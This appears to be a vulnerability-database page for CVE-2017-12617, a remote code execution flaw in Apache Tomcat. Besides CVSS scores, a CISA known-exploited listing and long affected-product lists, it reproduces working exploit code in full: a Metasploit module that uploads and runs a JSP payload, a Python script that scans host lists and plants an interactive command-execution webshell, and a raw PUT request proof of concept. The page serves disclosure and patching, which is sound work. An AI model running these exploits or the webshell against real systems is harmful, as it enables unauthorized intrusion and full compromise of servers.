Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-434 |
Unrestricted Upload of File with Dangerous Type The product allows the upload or transfer of dangerous file types that are automatically processed within its environment. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V3.1 |
8.1 |
HIGH |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Base: Exploitabilty MetricsThe Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). Attack Complexity This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability. successful attack depends on conditions beyond the attacker's control. That is, a successful attack cannot be accomplished at will, but requires the attacker to invest in some measurable amount of effort in preparation or execution against the vulnerable component before a successful attack can be expected. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. User Interaction This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component. The vulnerable system can be exploited without interaction from any user. Base: Scope MetricsThe Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope. Scope Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs. An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority. Base: Impact MetricsThe Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable). Temporal MetricsThe Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability. Environmental MetricsThese metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.
|
[email protected] |
V2 |
6.8 |
|
AV:N/AC:M/Au:N/C:P/I:P/A:P |
[email protected] |
CISA KEV (Known Exploited Vulnerabilities)
Vulnerability name : Apache Tomcat Remote Code Execution Vulnerability
Required action : Apply updates per vendor instructions.
Known To Be Used in Ransomware Campaigns : Unknown
Added : 2022-03-24
23h00 +00:00
Action is due : 2022-04-14
22h00 +00:00
Important information
This CVE is identified as vulnerable and poses an active threat, according to the Catalog of Known Exploited Vulnerabilities (CISA KEV). The CISA has listed this vulnerability as actively exploited by cybercriminals, emphasizing the importance of taking immediate action to address this flaw. It is imperative to prioritize the update and remediation of this CVE to protect systems against potential cyberattacks.
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 43008
Publication date : 2017-10-16
22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Tomcat RCE via JSP Upload Bypass',
'Description' => %q{
This module uploads a jsp payload and executes it.
},
'Author' => 'peewpw',
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-12617' ],
[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617' ],
[ 'URL', 'https://bz.apache.org/bugzilla/show_bug.cgi?id=61542' ]
],
'Privileged' => false,
'Platform' => %w{ linux win }, # others?
'Targets' =>
[
[ 'Automatic',
{
'Arch' => ARCH_JAVA,
'Platform' => 'win'
}
],
[ 'Java Windows',
{
'Arch' => ARCH_JAVA,
'Platform' => 'win'
}
],
[ 'Java Linux',
{
'Arch' => ARCH_JAVA,
'Platform' => 'linux'
}
]
],
'DisclosureDate' => 'Oct 03 2017',
'DefaultTarget' => 0))
register_options([
OptString.new('TARGETURI', [true, "The URI path of the Tomcat installation", "/"]),
Opt::RPORT(8080)
])
end
def check
testurl = Rex::Text::rand_text_alpha(10)
testcontent = Rex::Text::rand_text_alpha(10)
send_request_cgi({
'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
'method' => 'PUT',
'data' => "<% out.println(\"#{testcontent}\");%>"
})
res1 = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp"),
'method' => 'GET'
})
if res1 && res1.body.include?(testcontent)
send_request_cgi(
opts = {
'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
'method' => 'DELETE'
},
timeout = 1
)
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
print_status("Uploading payload...")
testurl = Rex::Text::rand_text_alpha(10)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
'method' => 'PUT',
'data' => payload.encoded
})
if res && res.code == 201
res1 = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp"),
'method' => 'GET'
})
if res1 && res1.code == 200
print_status("Payload executed!")
else
fail_with(Failure::PayloadFailed, "Failed to execute the payload")
end
else
fail_with(Failure::UnexpectedReply, "Failed to upload the payload")
end
end
end
Exploit Database EDB-ID : 42966
Publication date : 2017-10-08
22h00 +00:00
Author : intx0x80
EDB Verified : Yes
#!/usr/bin/python
import requests
import re
import signal
from optparse import OptionParser
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
banner="""
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
[@intx0x80]
"""
def signal_handler(signal, frame):
print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
exit()
signal.signal(signal.SIGINT, signal_handler)
def removetags(tags):
remove = re.compile('<.*?>')
txt = re.sub(remove, '\n', tags)
return txt.replace("\n\n\n","\n")
def getContent(url,f):
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
re=requests.get(str(url)+"/"+str(f), headers=headers)
return re.content
def createPayload(url,f):
evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
if req.status_code==201:
print ("File Created ..")
def RCE(url,f):
EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>"""
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
req=requests.put(str(url)+f+"/",data=EVIL, headers=headers)
def shell(url,f):
while True:
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
cmd=input("$ ")
payload={'cmd':cmd}
if cmd=="q" or cmd=="Q":
break
re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
re=str(re.content)
t=removetags(re)
print (t)
#print bcolors.HEADER+ banner+bcolors.ENDC
parse=OptionParser(
bcolors.HEADER+"""
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
./cve-2017-12617.py [options]
options:
-u ,--url [::] check target url if it's vulnerable
-p,--pwn [::] generate webshell and upload it
-l,--list [::] hosts list
[+]usage:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt
[@intx0x80]
"""+bcolors.ENDC
)
parse.add_option("-u","--url",dest="U",type="string",help="Website Url")
parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
(opt,args)=parse.parse_args()
if opt.U==None and opt.P==None and opt.L==None:
print(parse.usage)
exit(0)
else:
if opt.U!=None and opt.P==None and opt.L==None:
print (bcolors.OKGREEN+banner+bcolors.ENDC)
url=str(opt.U)
checker="Poc.jsp"
print (bcolors.BOLD +"Poc Filename {}".format(checker))
createPayload(str(url)+"/",checker)
con=getContent(str(url)+"/",checker)
if b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
print (bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
print (bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
else:
print ('Not Vulnerable to CVE-2017-12617 ')
elif opt.P!=None and opt.U!=None and opt.L==None:
print (bcolors.OKGREEN+banner+bcolors.ENDC)
pwn=str(opt.P)
url=str(opt.U)
print ("Uploading Webshell .....")
pwn=pwn+".jsp"
RCE(str(url)+"/",pwn)
shell(str(url),pwn)
elif opt.L!=None and opt.P==None and opt.U==None:
print (bcolors.OKGREEN+banner+bcolors.ENDC)
w=str(opt.L)
f=open(w,"r")
print ("Scaning hosts in {}".format(w))
checker="Poc.jsp"
for i in f.readlines():
i=i.strip("\n")
createPayload(str(i)+"/",checker)
con=getContent(str(i)+"/",checker)
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
print (str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")
Exploit Database EDB-ID : 42953
Publication date : 2017-09-19
22h00 +00:00
Author : xxlegend
EDB Verified : No
# E-DB Note: https://www.alphabot.com/security/blog/2017/java/Apache-Tomcat-RCE-CVE-2017-12617.html
When running on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request.
This JSP could then be requested and any code it contained would be executed by the server.
The PoC is like this:
PUT /1.jsp/ HTTP/1.1
Host: 192.168.3.103:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.3.103:8080/examples/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
Connection: close
Content-Length: 26
<% out.println("hello");%>
It is the bypass for CVE-2017-12615
Products Mentioned
Configuraton 0
Apache>>Tomcat >> Version From (including) 7.0.0 To (excluding) 7.0.82
Apache>>Tomcat >> Version From (including) 8.0 To (excluding) 8.0.47
Apache>>Tomcat >> Version From (including) 8.5.0 To (excluding) 8.5.23
Apache>>Tomcat >> Version From (including) 9.0.0 To (excluding) 9.0.1
Configuraton 0
Canonical>>Ubuntu_linux >> Version 12.04
Canonical>>Ubuntu_linux >> Version 16.04
Canonical>>Ubuntu_linux >> Version 17.10
Canonical>>Ubuntu_linux >> Version 18.04
Configuraton 0
Oracle>>Agile_plm >> Version 9.3.3
Oracle>>Agile_plm >> Version 9.3.4
Oracle>>Agile_plm >> Version 9.3.5
Oracle>>Agile_plm >> Version 9.3.6
Oracle>>Communications_instant_messaging_server >> Version 10.0.1
Oracle>>Endeca_information_discovery_integrator >> Version 3.1.0
Oracle>>Endeca_information_discovery_integrator >> Version 3.2.0
Oracle>>Enterprise_manager_for_mysql_database >> Version 12.1.0.4.0
- Oracle>>Enterprise_manager_for_mysql_database >> Version 12.1.0.4.0 (Open CPE detail)
Oracle>>Financial_services_analytical_applications_infrastructure >> Version From (including) 7.3.3.0.0 To (including) 7.3.5.3.0
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 7.3.3.0.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 7.3.3.0.1 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 7.3.3.0.2 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 7.3.5 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 7.3.5.0.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 7.3.5.1.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 7.3.5.2.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 7.3.5.3.0 (Open CPE detail)
Oracle>>Financial_services_analytical_applications_infrastructure >> Version From (including) 8.0.0.0.0 To (including) 8.0.9.0.0
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.0.0.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.0.1.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.0.2.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.0.3.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.1.0.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.1.1.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.1.2.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.2 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.2.0.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.2.1.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.2.2.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.3 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.3.0.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.3.1.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.3.2.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.3.3.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.4 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.4.0.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.4.1.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.4.2.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.4.3.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.4.4.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.4.5.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.5 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.5.0.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.5.0.1 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.5.1.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.5.2.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.5.3.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.5.4.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.6 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.6.0.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.6.0.1 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.6.1.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.6.2.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.6.3.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.6.4.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.7 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.7.0.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.7.1.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.7.2.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.8 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.8.0.0 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.9 (Open CPE detail)
- Oracle>>Financial_services_analytical_applications_infrastructure >> Version 8.0.9.0.0 (Open CPE detail)
Oracle>>Fmw_platform >> Version 12.2.1.2.0
Oracle>>Fmw_platform >> Version 12.2.1.3.0
Oracle>>Health_sciences_empirica_inspections >> Version 1.0.1.1
Oracle>>Hospitality_guest_access >> Version 4.2.0
Oracle>>Hospitality_guest_access >> Version 4.2.1
Oracle>>Instantis_enterprisetrack >> Version 17.1
Oracle>>Instantis_enterprisetrack >> Version 17.2
Oracle>>Management_pack >> Version 11.2.1.0.13
Oracle>>Micros_lucas >> Version 2.9.5
Oracle>>Micros_retail_xbri_loss_prevention >> Version 10.0.1
Oracle>>Micros_retail_xbri_loss_prevention >> Version 10.5.0
Oracle>>Micros_retail_xbri_loss_prevention >> Version 10.6.0
Oracle>>Micros_retail_xbri_loss_prevention >> Version 10.7.0
Oracle>>Micros_retail_xbri_loss_prevention >> Version 10.8.0
Oracle>>Micros_retail_xbri_loss_prevention >> Version 10.8.1
Oracle>>Mysql_enterprise_monitor >> Version To (including) 3.3.6.3293
Oracle>>Mysql_enterprise_monitor >> Version From (including) 3.4.0 To (including) 3.4.4.4226
Oracle>>Mysql_enterprise_monitor >> Version From (including) 4.0.0 To (including) 4.0.0.5135
Oracle>>Retail_advanced_inventory_planning >> Version 13.2
Oracle>>Retail_advanced_inventory_planning >> Version 13.4
Oracle>>Retail_advanced_inventory_planning >> Version 14.1
Oracle>>Retail_advanced_inventory_planning >> Version 15.0
Oracle>>Retail_back_office >> Version 14.0.4
Oracle>>Retail_back_office >> Version 14.1.3
Oracle>>Retail_central_office >> Version 14.0.4
Oracle>>Retail_central_office >> Version 14.1.3
Oracle>>Retail_convenience_and_fuel_pos_software >> Version 2.1.132
- Oracle>>Retail_convenience_and_fuel_pos_software >> Version 2.1.132 (Open CPE detail)
Oracle>>Retail_eftlink >> Version 1.1.124
Oracle>>Retail_eftlink >> Version 15.0.1
Oracle>>Retail_eftlink >> Version 16.0.2
Oracle>>Retail_insights >> Version 14.0
Oracle>>Retail_insights >> Version 14.1
Oracle>>Retail_insights >> Version 15.0
Oracle>>Retail_insights >> Version 16.0
Oracle>>Retail_invoice_matching >> Version 12.0
Oracle>>Retail_invoice_matching >> Version 13.0
Oracle>>Retail_invoice_matching >> Version 13.1
Oracle>>Retail_invoice_matching >> Version 13.2
Oracle>>Retail_invoice_matching >> Version 14.0
Oracle>>Retail_invoice_matching >> Version 14.1
Oracle>>Retail_invoice_matching >> Version 15.0
Oracle>>Retail_invoice_matching >> Version 16.0
Oracle>>Retail_order_broker >> Version 5.0
Oracle>>Retail_order_broker >> Version 5.1
Oracle>>Retail_order_broker >> Version 5.2
Oracle>>Retail_order_broker >> Version 15.0
Oracle>>Retail_order_broker >> Version 16.0
Oracle>>Retail_order_management_system >> Version 4.0
Oracle>>Retail_order_management_system >> Version 4.5
Oracle>>Retail_order_management_system >> Version 4.7
Oracle>>Retail_order_management_system >> Version 5.0
Oracle>>Retail_point-of-service >> Version 14.0.4
Oracle>>Retail_point-of-service >> Version 14.1.3
Oracle>>Retail_price_management >> Version 12.0
Oracle>>Retail_price_management >> Version 13.0
Oracle>>Retail_price_management >> Version 13.1
Oracle>>Retail_price_management >> Version 13.2
Oracle>>Retail_price_management >> Version 14.0
Oracle>>Retail_price_management >> Version 14.1
Oracle>>Retail_price_management >> Version 15.0
Oracle>>Retail_price_management >> Version 16.0
Oracle>>Retail_returns_management >> Version 2.3.8
Oracle>>Retail_returns_management >> Version 2.4.9
Oracle>>Retail_returns_management >> Version 14.0.4
Oracle>>Retail_returns_management >> Version 14.1.3
Oracle>>Retail_store_inventory_management >> Version 12.0.12
Oracle>>Retail_store_inventory_management >> Version 13.0.7
Oracle>>Retail_store_inventory_management >> Version 13.1.9
Oracle>>Retail_store_inventory_management >> Version 13.2.9
Oracle>>Retail_store_inventory_management >> Version 14.0.4
Oracle>>Retail_store_inventory_management >> Version 14.1.3
Oracle>>Retail_store_inventory_management >> Version 15.0.2
Oracle>>Retail_store_inventory_management >> Version 16.0.1
Oracle>>Retail_xstore_point_of_service >> Version 6.0.11
Oracle>>Retail_xstore_point_of_service >> Version 7.0.6
Oracle>>Retail_xstore_point_of_service >> Version 7.1.6
Oracle>>Retail_xstore_point_of_service >> Version 15.0.1
Oracle>>Transportation_management >> Version 6.3.1
Oracle>>Transportation_management >> Version 6.3.2
Oracle>>Transportation_management >> Version 6.3.3
Oracle>>Transportation_management >> Version 6.3.4
Oracle>>Transportation_management >> Version 6.3.5
Oracle>>Transportation_management >> Version 6.3.6
Oracle>>Transportation_management >> Version 6.3.7
Oracle>>Tuxedo_system_and_applications_monitor >> Version 12.1.3.0.0
- Oracle>>Tuxedo_system_and_applications_monitor >> Version 12.1.3.0.0 (Open CPE detail)
Oracle>>Webcenter_sites >> Version 11.1.1.8.0
Oracle>>Workload_manager >> Version 12.2.0.1
Configuraton 0
Debian>>Debian_linux >> Version 7.0
Configuraton 0
Netapp>>Active_iq_unified_manager >> Version From (including) 7.3
Netapp>>Active_iq_unified_manager >> Version From (including) 9.5
Netapp>>Oncommand_balance >> Version -
Netapp>>Oncommand_insight >> Version -
Netapp>>Oncommand_shift >> Version -
Netapp>>Oncommand_workflow_automation >> Version -
Netapp>>Snapcenter >> Version -
Netapp>>Element >> Version -
Configuraton 0
Redhat>>Fuse >> Version 1.0
Redhat>>Jboss_enterprise_application_platform >> Version 6.0.0
Redhat>>Jboss_enterprise_application_platform >> Version 6.4.0
Redhat>>Jboss_enterprise_web_server >> Version 2.0.0
Redhat>>Jboss_enterprise_web_server >> Version 3.0.0
Redhat>>Jboss_enterprise_web_server_text-only_advisories >> Version -
Redhat>>Enterprise_linux_desktop >> Version 6.0
Redhat>>Enterprise_linux_desktop >> Version 7.0
Redhat>>Enterprise_linux_eus >> Version 7.4
Redhat>>Enterprise_linux_eus >> Version 7.5
Redhat>>Enterprise_linux_eus >> Version 7.6
Redhat>>Enterprise_linux_eus >> Version 7.7
Redhat>>Enterprise_linux_eus_compute_node >> Version 7.4
Redhat>>Enterprise_linux_eus_compute_node >> Version 7.5
Redhat>>Enterprise_linux_eus_compute_node >> Version 7.6
Redhat>>Enterprise_linux_eus_compute_node >> Version 7.7
Redhat>>Enterprise_linux_for_ibm_z_systems >> Version 6.0_s390x
Redhat>>Enterprise_linux_for_ibm_z_systems >> Version 7.0_s390x
Redhat>>Enterprise_linux_for_ibm_z_systems_eus >> Version 7.4_s390x
- Redhat>>Enterprise_linux_for_ibm_z_systems_eus >> Version 7.4_s390x (Open CPE detail)
Redhat>>Enterprise_linux_for_ibm_z_systems_eus >> Version 7.5_s390x
- Redhat>>Enterprise_linux_for_ibm_z_systems_eus >> Version 7.5_s390x (Open CPE detail)
Redhat>>Enterprise_linux_for_ibm_z_systems_eus >> Version 7.6_s390x
- Redhat>>Enterprise_linux_for_ibm_z_systems_eus >> Version 7.6_s390x (Open CPE detail)
Redhat>>Enterprise_linux_for_ibm_z_systems_eus >> Version 7.7_s390x
- Redhat>>Enterprise_linux_for_ibm_z_systems_eus >> Version 7.7_s390x (Open CPE detail)
Redhat>>Enterprise_linux_for_power_big_endian >> Version 6.0_ppc64
Redhat>>Enterprise_linux_for_power_big_endian >> Version 7.0_ppc64
Redhat>>Enterprise_linux_for_power_big_endian_eus >> Version 7.4_ppc64
- Redhat>>Enterprise_linux_for_power_big_endian_eus >> Version 7.4_ppc64 (Open CPE detail)
Redhat>>Enterprise_linux_for_power_big_endian_eus >> Version 7.5_ppc64
- Redhat>>Enterprise_linux_for_power_big_endian_eus >> Version 7.5_ppc64 (Open CPE detail)
Redhat>>Enterprise_linux_for_power_big_endian_eus >> Version 7.6_ppc64
- Redhat>>Enterprise_linux_for_power_big_endian_eus >> Version 7.6_ppc64 (Open CPE detail)
Redhat>>Enterprise_linux_for_power_big_endian_eus >> Version 7.7_ppc64
- Redhat>>Enterprise_linux_for_power_big_endian_eus >> Version 7.7_ppc64 (Open CPE detail)
Redhat>>Enterprise_linux_for_power_little_endian >> Version 7.0
Redhat>>Enterprise_linux_for_power_little_endian_eus >> Version 7.4_ppc64le
- Redhat>>Enterprise_linux_for_power_little_endian_eus >> Version 7.4_ppc64le (Open CPE detail)
Redhat>>Enterprise_linux_for_power_little_endian_eus >> Version 7.5_ppc64le
- Redhat>>Enterprise_linux_for_power_little_endian_eus >> Version 7.5_ppc64le (Open CPE detail)
Redhat>>Enterprise_linux_for_power_little_endian_eus >> Version 7.6_ppc64le
- Redhat>>Enterprise_linux_for_power_little_endian_eus >> Version 7.6_ppc64le (Open CPE detail)
Redhat>>Enterprise_linux_for_power_little_endian_eus >> Version 7.7_ppc64le
- Redhat>>Enterprise_linux_for_power_little_endian_eus >> Version 7.7_ppc64le (Open CPE detail)
Redhat>>Enterprise_linux_server >> Version 6.0
Redhat>>Enterprise_linux_server >> Version 7.0
Redhat>>Enterprise_linux_server_aus >> Version 7.4
Redhat>>Enterprise_linux_server_aus >> Version 7.6
Redhat>>Enterprise_linux_server_aus >> Version 7.7
Redhat>>Enterprise_linux_server_tus >> Version 7.4
Redhat>>Enterprise_linux_server_tus >> Version 7.6
Redhat>>Enterprise_linux_server_tus >> Version 7.7
Redhat>>Enterprise_linux_workstation >> Version 6.0
Redhat>>Enterprise_linux_workstation >> Version 7.0
References